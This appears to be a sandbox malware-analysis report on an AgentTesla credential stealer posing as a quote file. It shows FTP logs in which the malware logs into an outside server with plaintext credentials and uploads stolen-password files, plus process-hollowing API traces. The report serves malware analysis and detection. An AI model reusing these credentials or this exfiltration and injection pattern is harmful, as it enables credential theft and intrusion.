                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:43. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:43. Server port: 21.220-This is a private system - No anonymous login
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:43. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:43. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                        Sep 27, 2024 10:43:37.644542933 CEST4970521192.168.2.55.2.84.236USER fgghv@alternatifplastik.com
                                                        Sep 27, 2024 10:43:37.869940042 CEST21497055.2.84.236192.168.2.5331 User fgghv@alternatifplastik.com OK. Password required
                                                        Sep 27, 2024 10:43:37.870100975 CEST4970521192.168.2.55.2.84.236PASS Fineboy777@
                                                        Sep 27, 2024 10:43:38.161242962 CEST21497055.2.84.236192.168.2.5230 OK. Current restricted directory is /
                                                        Sep 27, 2024 10:43:38.386324883 CEST21497055.2.84.236192.168.2.5504 Unknown command
                                                        Sep 27, 2024 10:43:38.386569977 CEST4970521192.168.2.55.2.84.236PWD
                                                        Sep 27, 2024 10:43:38.611373901 CEST21497055.2.84.236192.168.2.5257 "/" is your current location
                                                        Sep 27, 2024 10:43:38.632256031 CEST4970521192.168.2.55.2.84.236TYPE I
                                                        Sep 27, 2024 10:43:38.857228041 CEST21497055.2.84.236192.168.2.5200 TYPE is now 8-bit binary
                                                        Sep 27, 2024 10:43:38.860129118 CEST4970521192.168.2.55.2.84.236PASV
                                                        Sep 27, 2024 10:43:39.085021973 CEST21497055.2.84.236192.168.2.5227 Entering Passive Mode (5,2,84,236,218,179)
                                                        Sep 27, 2024 10:43:39.090953112 CEST4970521192.168.2.55.2.84.236STOR PW_user-701188_2024_09_27_04_43_36.html
                                                        Sep 27, 2024 10:43:39.726114988 CEST21497055.2.84.236192.168.2.5150 Accepted data connection
                                                        Sep 27, 2024 10:43:39.952034950 CEST21497055.2.84.236192.168.2.5226-File successfully transferred
                                                        226-File successfully transferred226 0.227 seconds (measured here), 1.38 Kbytes per second
                                                        Sep 27, 2024 10:44:00.846366882 CEST21520785.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:43. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:43. Server port: 21.220-This is a private system - No anonymous login
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:43. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:43. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                        Sep 27, 2024 10:44:00.877207041 CEST5207821192.168.2.55.2.84.236USER fgghv@alternatifplastik.com
                                                        Sep 27, 2024 10:44:01.104191065 CEST21520785.2.84.236192.168.2.5331 User fgghv@alternatifplastik.com OK. Password required
                                                        Sep 27, 2024 10:44:01.104353905 CEST5207821192.168.2.55.2.84.236PASS Fineboy777@
                                                        Sep 27, 2024 10:44:01.356802940 CEST21520785.2.84.236192.168.2.5230 OK. Current restricted directory is /
                                                        Sep 27, 2024 10:44:01.584502935 CEST21520785.2.84.236192.168.2.5504 Unknown command
                                                        Sep 27, 2024 10:44:01.584752083 CEST5207821192.168.2.55.2.84.236PWD
                                                        Sep 27, 2024 10:44:01.805085897 CEST21520785.2.84.236192.168.2.5257 "/" is your current location
                                                        Sep 27, 2024 10:44:01.805367947 CEST5207821192.168.2.55.2.84.236TYPE I
                                                        Sep 27, 2024 10:44:02.025809050 CEST21520785.2.84.236192.168.2.5200 TYPE is now 8-bit binary
                                                        Sep 27, 2024 10:44:02.026000023 CEST5207821192.168.2.55.2.84.236PASV
                                                        Sep 27, 2024 10:44:02.246365070 CEST21520785.2.84.236192.168.2.5227 Entering Passive Mode (5,2,84,236,237,183)
                                                        Sep 27, 2024 10:44:02.252408028 CEST5207821192.168.2.55.2.84.236STOR PW_user-701188_2024_09_27_04_43_59.html
                                                        Sep 27, 2024 10:44:02.871179104 CEST21520785.2.84.236192.168.2.5150 Accepted data connection
                                                        Sep 27, 2024 10:44:03.096740961 CEST21520785.2.84.236192.168.2.5226-File successfully transferred
                                                        226-File successfully transferred226 0.229 seconds (measured here), 1.36 Kbytes per second
                                                        Sep 27, 2024 10:44:09.020767927 CEST21520805.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:44. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:44. Server port: 21.220-This is a private system - No anonymous login
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                        Sep 27, 2024 10:44:09.021080017 CEST5208021192.168.2.55.2.84.236USER fgghv@alternatifplastik.com
                                                        Sep 27, 2024 10:44:09.245609045 CEST21520805.2.84.236192.168.2.5331 User fgghv@alternatifplastik.com OK. Password required
                                                        Sep 27, 2024 10:44:09.245783091 CEST5208021192.168.2.55.2.84.236PASS Fineboy777@
                                                        Sep 27, 2024 10:44:09.495488882 CEST21520805.2.84.236192.168.2.5230 OK. Current restricted directory is /
                                                        Sep 27, 2024 10:44:09.720036030 CEST21520805.2.84.236192.168.2.5504 Unknown command
                                                        Sep 27, 2024 10:44:09.720227003 CEST5208021192.168.2.55.2.84.236PWD
                                                        Sep 27, 2024 10:44:09.944448948 CEST21520805.2.84.236192.168.2.5257 "/" is your current location
                                                        Sep 27, 2024 10:44:09.944714069 CEST5208021192.168.2.55.2.84.236TYPE I
                                                        Sep 27, 2024 10:44:10.169923067 CEST21520805.2.84.236192.168.2.5200 TYPE is now 8-bit binary
                                                        Sep 27, 2024 10:44:10.170335054 CEST5208021192.168.2.55.2.84.236PASV
                                                        Sep 27, 2024 10:44:10.394684076 CEST21520805.2.84.236192.168.2.5227 Entering Passive Mode (5,2,84,236,203,141)
                                                        Sep 27, 2024 10:44:10.402749062 CEST5208021192.168.2.55.2.84.236STOR PW_user-701188_2024_09_27_04_44_07.html
                                                        Sep 27, 2024 10:44:11.022186995 CEST21520805.2.84.236192.168.2.5150 Accepted data connection
                                                        Sep 27, 2024 10:44:11.247031927 CEST21520805.2.84.236192.168.2.5226-File successfully transferred
                                                        226-File successfully transferred226 0.225 seconds (measured here), 1.39 Kbytes per second

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:04:43:21
                                                        Start date:27/09/2024
                                                        Path:C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe"
                                                        Imagebase:0xd0000
                                                        File size:30'208 bytes
                                                        MD5 hash:A016634929C4D57CC24719723A4CD65C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2231136103.0000000005860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2206832205.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:04:43:34
                                                        Start date:27/09/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x290000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2448653484.000000000263E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2448653484.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2448653484.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:04:43:44
                                                        Start date:27/09/2024
                                                        Path:C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe"
                                                        Imagebase:0xbc0000
                                                        File size:30'208 bytes
                                                        MD5 hash:A016634929C4D57CC24719723A4CD65C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2446673623.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 50%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:04:43:52
                                                        Start date:27/09/2024
                                                        Path:C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe"
                                                        Imagebase:0x4a0000
                                                        File size:30'208 bytes
                                                        MD5 hash:A016634929C4D57CC24719723A4CD65C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:04:43:58
                                                        Start date:27/09/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x8d0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2532815910.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2532815910.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2532815910.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:04:44:06
                                                        Start date:27/09/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x820000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3319267989.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3319267989.0000000002C07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:11%
                                                          Dynamic/Decrypted Code Coverage:99.3%
                                                          Signature Coverage:3.2%
                                                          Total number of Nodes:411
                                                          Total number of Limit Nodes:14
                                                          execution_graph 58021 5a0e760 58022 5a0e7a4 VirtualAlloc 58021->58022 58024 5a0e811 58022->58024 58064 598dcc8 58065 598dd17 NtProtectVirtualMemory 58064->58065 58067 598dd8f 58065->58067 58106 585db77 58107 585db81 58106->58107 58111 5986b70 58107->58111 58115 5986b60 58107->58115 58112 5986b85 58111->58112 58119 5986cb5 58112->58119 58116 5986b70 58115->58116 58118 5986cb5 2 API calls 58116->58118 58117 585d837 58118->58117 58120 5986ca6 58119->58120 58120->58119 58121 5986dec 58120->58121 58124 598a768 58120->58124 58128 598a770 58120->58128 58125 598a7b4 SleepEx 58124->58125 58127 598a814 58125->58127 58127->58120 58129 598a7b4 SleepEx 58128->58129 58131 598a814 58129->58131 58131->58120 58089 796690 58090 7966aa 58089->58090 58091 7966ba 58090->58091 58095 5a05d54 58090->58095 58098 5a089ea 58090->58098 58102 5a03594 58090->58102 58097 5a0d0b8 VirtualProtect 58095->58097 58096 5a05d71 58097->58096 58099 5a08a03 58098->58099 58101 5a0d0b8 VirtualProtect 58099->58101 58100 5a001dc 58101->58100 58103 5a035ad 58102->58103 58105 5a0d0b8 VirtualProtect 58103->58105 58104 5a035d4 58105->58104 58068 6bd030 58070 6bd048 58068->58070 58069 6bd0a3 58070->58069 58072 5a0dc80 58070->58072 58073 5a0dcd9 58072->58073 58076 5a0e210 58073->58076 58074 5a0dd0e 58077 5a0e23d 58076->58077 58080 5a0e3d3 58077->58080 58081 5a0d0b8 58077->58081 58080->58074 58083 5a0d0df 58081->58083 58085 5a0d598 58083->58085 58086 5a0d5e1 VirtualProtect 58085->58086 58088 5a0d19c 58086->58088 58088->58074 58132 585e0f9 58133 585e103 58132->58133 58137 59696d0 58133->58137 58143 59696c1 58133->58143 58134 585e141 58138 59696e5 58137->58138 58149 5969710 58138->58149 58153 59698cd 58138->58153 58157 5969700 58138->58157 58139 59696fb 58139->58134 58144 59696e5 58143->58144 58146 5969710 11 API calls 58144->58146 58147 5969700 11 API calls 58144->58147 58148 59698cd 11 API calls 58144->58148 58145 59696fb 58145->58134 58146->58145 58147->58145 58148->58145 58151 596973a 58149->58151 58150 5969782 58150->58139 58151->58150 58161 596aa58 58151->58161 58155 5969767 58153->58155 58154 5969782 58154->58139 58155->58154 58156 596aa58 11 API calls 58155->58156 58156->58155 58159 5969710 58157->58159 58158 5969782 58158->58139 58159->58158 58160 596aa58 11 API calls 58159->58160 58160->58159 58162 596aa7d 58161->58162 58173 596aaa7 58162->58173 58177 596aab8 58162->58177 58181 596abea 58162->58181 58185 596ac6a 58162->58185 58189 596abed 58162->58189 58193 596aebd 58162->58193 58197 596af40 58162->58197 58201 596acf5 58162->58201 58205 596adc5 58162->58205 58174 596aab8 58173->58174 58209 596b228 58174->58209 58245 596b277 58174->58245 58178 596aae5 58177->58178 58179 596b277 11 API calls 58178->58179 58180 596b228 11 API calls 58178->58180 58179->58178 58180->58178 58182 596ab1d 58181->58182 58183 596b277 11 API calls 58182->58183 58184 596b228 11 API calls 58182->58184 58183->58182 58184->58182 58186 596ab1d 58185->58186 58187 596b277 11 API calls 58186->58187 58188 596b228 11 API calls 58186->58188 58187->58186 58188->58186 58190 596ab1d 58189->58190 58191 596b277 11 API calls 58190->58191 58192 596b228 11 API calls 58190->58192 58191->58190 58192->58190 58194 596ab1d 58193->58194 58195 596b277 11 API calls 58194->58195 58196 596b228 11 API calls 58194->58196 58195->58194 58196->58194 58198 596ab1d 58197->58198 58199 596b277 11 API calls 58198->58199 58200 596b228 11 API calls 58198->58200 58199->58198 58200->58198 58202 596ab1d 58201->58202 58203 596b277 11 API calls 58202->58203 58204 596b228 11 API calls 58202->58204 58203->58202 58204->58202 58206 596ab1d 58205->58206 58207 596b277 11 API calls 58206->58207 58208 596b228 11 API calls 58206->58208 58207->58206 58208->58206 58210 596b24d 58209->58210 58282 596bf63 58210->58282 58286 596b664 58210->58286 58290 596bea4 58210->58290 58294 596b838 58210->58294 58300 596c07c 58210->58300 58304 596b3be 58210->58304 58309 596b6f2 58210->58309 58314 596c136 58210->58314 58318 596c2cb 58210->58318 58325 596b34c 58210->58325 58329 596b70c 58210->58329 58334 596b9cf 58210->58334 58338 596bb81 58210->58338 58342 596c182 58210->58342 58346 596c044 58210->58346 58350 596bd99 58210->58350 58354 596bbdb 58210->58354 58362 596b91b 58210->58362 58367 596b39a 58210->58367 58371 596bb1d 58210->58371 58375 596c09f 58210->58375 58379 596bc90 58210->58379 58386 596c252 58210->58386 58390 596b752 58210->58390 58396 596bfd5 58210->58396 58400 596c1d5 58210->58400 58404 596c217 58210->58404 58408 596b416 58210->58408 58412 596ba56 58210->58412 58421 596b8a8 58210->58421 58430 596b7ed 58210->58430 58434 596b9ec 58210->58434 58438 596bdef 58210->58438 58211 596b26f 58211->58174 58246 596b243 58245->58246 58248 596b286 58245->58248 58249 596ba56 5 API calls 58246->58249 58250 596b416 2 API calls 58246->58250 58251 596c217 2 API calls 58246->58251 58252 596c1d5 2 API calls 58246->58252 58253 596bfd5 2 API calls 58246->58253 58254 596b752 3 API calls 58246->58254 58255 596c252 2 API calls 58246->58255 58256 596bc90 4 API calls 58246->58256 58257 596c09f 2 API calls 58246->58257 58258 596bb1d 2 API calls 58246->58258 58259 596b39a 2 API calls 58246->58259 58260 596b91b 2 API calls 58246->58260 58261 596bbdb 4 API calls 58246->58261 58262 596bd99 2 API calls 58246->58262 58263 596c044 2 API calls 58246->58263 58264 596c182 2 API calls 58246->58264 58265 596bb81 2 API calls 58246->58265 58266 596b9cf 2 API calls 58246->58266 58267 596b70c 2 API calls 58246->58267 58268 596b34c 2 API calls 58246->58268 58269 596c2cb 4 API calls 58246->58269 58270 596c136 2 API calls 58246->58270 58271 596b6f2 2 API calls 58246->58271 58272 596b3be 2 API calls 58246->58272 58273 596c07c 2 API calls 58246->58273 58274 596b838 2 API calls 58246->58274 58275 596bea4 2 API calls 58246->58275 58276 596b664 2 API calls 58246->58276 58277 596bf63 2 API calls 58246->58277 58278 596bdef 2 API calls 58246->58278 58279 596b9ec 2 API calls 58246->58279 58280 596b7ed 2 API calls 58246->58280 58281 596b8a8 4 API calls 58246->58281 58247 596b26f 58247->58174 58249->58247 58250->58247 58251->58247 58252->58247 58253->58247 58254->58247 58255->58247 58256->58247 58257->58247 58258->58247 58259->58247 58260->58247 58261->58247 58262->58247 58263->58247 58264->58247 58265->58247 58266->58247 58267->58247 58268->58247 58269->58247 58270->58247 58271->58247 58272->58247 58273->58247 58274->58247 58275->58247 58276->58247 58277->58247 58278->58247 58279->58247 58280->58247 58281->58247 58283 596b3a6 58282->58283 58442 598e928 58283->58442 58446 598e921 58283->58446 58287 596b3a6 58286->58287 58288 598e928 Wow64SetThreadContext 58287->58288 58289 598e921 Wow64SetThreadContext 58287->58289 58288->58287 58289->58287 58291 596b3a6 58290->58291 58292 598e928 Wow64SetThreadContext 58291->58292 58293 598e921 Wow64SetThreadContext 58291->58293 58292->58291 58293->58291 58450 596de78 58294->58450 58455 596de68 58294->58455 58295 596b3a6 58298 598e928 Wow64SetThreadContext 58295->58298 58299 598e921 Wow64SetThreadContext 58295->58299 58298->58295 58299->58295 58301 596b3a6 58300->58301 58302 598e928 Wow64SetThreadContext 58301->58302 58303 598e921 Wow64SetThreadContext 58301->58303 58302->58301 58303->58301 58305 596b3d6 58304->58305 58460 596c810 58305->58460 58464 596c820 58305->58464 58306 596b3ee 58310 596b6fc 58309->58310 58480 596df10 58310->58480 58485 596df01 58310->58485 58311 596b986 58311->58211 58315 596b3a6 58314->58315 58316 598e928 Wow64SetThreadContext 58315->58316 58317 598e921 Wow64SetThreadContext 58315->58317 58316->58315 58317->58315 58319 596c2e3 58318->58319 58498 598efe8 58319->58498 58502 598efe0 58319->58502 58320 596b3a6 58321 598e928 Wow64SetThreadContext 58320->58321 58322 598e921 Wow64SetThreadContext 58320->58322 58321->58320 58322->58320 58326 596b35d 58325->58326 58327 598e928 Wow64SetThreadContext 58326->58327 58328 598e921 Wow64SetThreadContext 58326->58328 58327->58326 58328->58326 58330 596b719 58329->58330 58332 598ee88 VirtualAllocEx 58330->58332 58333 598ee81 VirtualAllocEx 58330->58333 58331 596bf41 58332->58331 58333->58331 58335 596b3a6 58334->58335 58336 598e928 Wow64SetThreadContext 58335->58336 58337 598e921 Wow64SetThreadContext 58335->58337 58336->58335 58337->58335 58339 596b3a6 58338->58339 58340 598e928 Wow64SetThreadContext 58339->58340 58341 598e921 Wow64SetThreadContext 58339->58341 58340->58339 58341->58339 58343 596b3a6 58342->58343 58343->58342 58344 598e928 Wow64SetThreadContext 58343->58344 58345 598e921 Wow64SetThreadContext 58343->58345 58344->58343 58345->58343 58347 596b3a6 58346->58347 58348 598e928 Wow64SetThreadContext 58347->58348 58349 598e921 Wow64SetThreadContext 58347->58349 58348->58347 58349->58347 58351 596b3a6 58350->58351 58352 598e928 Wow64SetThreadContext 58351->58352 58353 598e921 Wow64SetThreadContext 58351->58353 58352->58351 58353->58351 58355 596bbfa 58354->58355 58360 598efe8 WriteProcessMemory 58355->58360 58361 598efe0 WriteProcessMemory 58355->58361 58356 596bb3f 58357 596b3a6 58357->58356 58358 598e928 Wow64SetThreadContext 58357->58358 58359 598e921 Wow64SetThreadContext 58357->58359 58358->58357 58359->58357 58360->58357 58361->58357 58363 596b925 58362->58363 58365 596df10 2 API calls 58363->58365 58366 596df01 2 API calls 58363->58366 58364 596b986 58364->58211 58365->58364 58366->58364 58368 596b3a6 58367->58368 58369 598e928 Wow64SetThreadContext 58368->58369 58370 598e921 Wow64SetThreadContext 58368->58370 58369->58368 58370->58368 58372 596b3a6 58371->58372 58373 598e928 Wow64SetThreadContext 58372->58373 58374 598e921 Wow64SetThreadContext 58372->58374 58373->58372 58374->58372 58376 596b3a6 58375->58376 58377 598e928 Wow64SetThreadContext 58376->58377 58378 598e921 Wow64SetThreadContext 58376->58378 58377->58376 58378->58376 58380 596bcb0 58379->58380 58382 598efe8 WriteProcessMemory 58380->58382 58383 598efe0 WriteProcessMemory 58380->58383 58381 596b3a6 58384 598e928 Wow64SetThreadContext 58381->58384 58385 598e921 Wow64SetThreadContext 58381->58385 58382->58381 58383->58381 58384->58381 58385->58381 58387 596b3a6 58386->58387 58388 598e928 Wow64SetThreadContext 58387->58388 58389 598e921 Wow64SetThreadContext 58387->58389 58388->58387 58389->58387 58391 596b75c 58390->58391 58506 598f1f9 58391->58506 58510 598f200 58391->58510 58514 598f1af 58391->58514 58392 596b793 58397 596b3a6 58396->58397 58398 598e928 Wow64SetThreadContext 58397->58398 58399 598e921 Wow64SetThreadContext 58397->58399 58398->58397 58399->58397 58401 596b3a6 58400->58401 58402 598e928 Wow64SetThreadContext 58401->58402 58403 598e921 Wow64SetThreadContext 58401->58403 58402->58401 58403->58401 58405 596b3a6 58404->58405 58406 598e928 Wow64SetThreadContext 58405->58406 58407 598e921 Wow64SetThreadContext 58405->58407 58406->58405 58407->58405 58409 596b3a6 58408->58409 58410 598e928 Wow64SetThreadContext 58409->58410 58411 598e921 Wow64SetThreadContext 58409->58411 58410->58409 58411->58409 58413 596b778 58412->58413 58414 596b3a6 58412->58414 58418 598f1f9 NtResumeThread 58413->58418 58419 598f1af NtResumeThread 58413->58419 58420 598f200 NtResumeThread 58413->58420 58416 598e928 Wow64SetThreadContext 58414->58416 58417 598e921 Wow64SetThreadContext 58414->58417 58415 596b793 58416->58414 58417->58414 58418->58415 58419->58415 58420->58415 58422 596b8b2 58421->58422 58423 596b941 58421->58423 58422->58423 58424 596b3a6 58422->58424 58428 596df10 2 API calls 58423->58428 58429 596df01 2 API calls 58423->58429 58426 598e928 Wow64SetThreadContext 58424->58426 58427 598e921 Wow64SetThreadContext 58424->58427 58425 596b986 58425->58211 58426->58424 58427->58424 58428->58425 58429->58425 58431 596b3a6 58430->58431 58432 598e928 Wow64SetThreadContext 58431->58432 58433 598e921 Wow64SetThreadContext 58431->58433 58432->58431 58433->58431 58435 596b3a6 58434->58435 58436 598e928 Wow64SetThreadContext 58435->58436 58437 598e921 Wow64SetThreadContext 58435->58437 58436->58435 58437->58435 58439 596b3a6 58438->58439 58440 598e928 Wow64SetThreadContext 58439->58440 58441 598e921 Wow64SetThreadContext 58439->58441 58440->58439 58441->58439 58443 598e971 